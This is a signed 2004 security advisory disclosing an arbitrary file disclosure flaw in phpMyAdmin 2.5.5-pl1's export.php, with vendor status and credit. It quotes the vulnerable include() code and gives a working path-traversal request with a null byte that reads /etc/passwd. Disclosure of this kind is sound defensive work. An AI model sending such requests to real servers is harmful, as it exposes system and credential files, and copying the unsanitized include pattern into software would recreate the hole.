home *** CD-ROM | disk | FTP | other *** search
- -----BEGIN PGP SIGNED MESSAGE-----
- Hash: SHA1
-
-
- Arbitrary File Disclosure Vulnerability in phpMyAdmin 2.5.5-pl1 and prior
-
- ################################################################################
- Summary :
-
- phpMyAdmin is a tool written in PHP intended to handle the administration of
- MySQL over the WWW. There is a vulnerability in the current stable version of
- phpMyAdmin that allows an attacker to retrieve arbitrary files from the
- webserver with privileges of the webserver..
-
- ################################################################################
- Details :
-
- The export PHP script can be exploited to disclose arbitrary file using a
- include() PHP call.
-
- Vulnerable Systems:
- * phpMyAdmin 2.5.5-pl1 and prior
-
- Release Date :
- February 2, 2004
-
- Severity :
- HIGH
-
- ################################################################################
- Examples :
-
- -------------------------------------------
-
- I - Arbitrary File Disclosure
- (HIGH Risk)
-
- File impacted : export.php
-
- 14:// What type of export are we doing?
- 15:if ($what == 'excel') {
- 16: $type = 'csv';
- 17:} else {
- 18: $type = $what;
- 19:}
- 20:
- 21:/**
- 22: * Defines the url to return to in case of error in a sql statement
- 23: */
- 24:require('./libraries/export/' . $type . '.php');
-
- Exploit example:
-
- - -- HTTP Request --
-
- http://[target]/[phpMyAdmin_directory]/export.php?what=../../../../../../etc/passwd%00
-
- - -- HTTP Request --
-
- The vulnerability is available evenif PHP register_globals is set to off.
-
- ################################################################################
- Vendor Status :
-
- The information has been provided to the phpMyAdmin Project Managers.
- A new release candidate 2.5.6-rc1 with fixes for this vulnerability is available.
- - --> http://www.phpmyadmin.net/home_page/
- - --> http://www.phpmyadmin.net/home_page/relnotes.php?rel=0
-
- ################################################################################
- Credit :
-
- Cedric Cochin, Security Engineer, netVigilance, Inc. (www.netvigilance.com)
- < cco@netvigilance.com >
-
- -----BEGIN PGP SIGNATURE-----
- Version: GnuPG v1.0.6 (GNU/Linux)
- Comment: For info see http://www.gnupg.org
-
- iD8DBQFAH3dJA9/8vqmWoYQRAjNoAJ4pGgoQBT9WoyPmbfw4h/6LkcjR6wCeNBj2
- ekO25itz2ssIvwgf2WRb/4k=
- =Yuh1
- -----END PGP SIGNATURE-----
-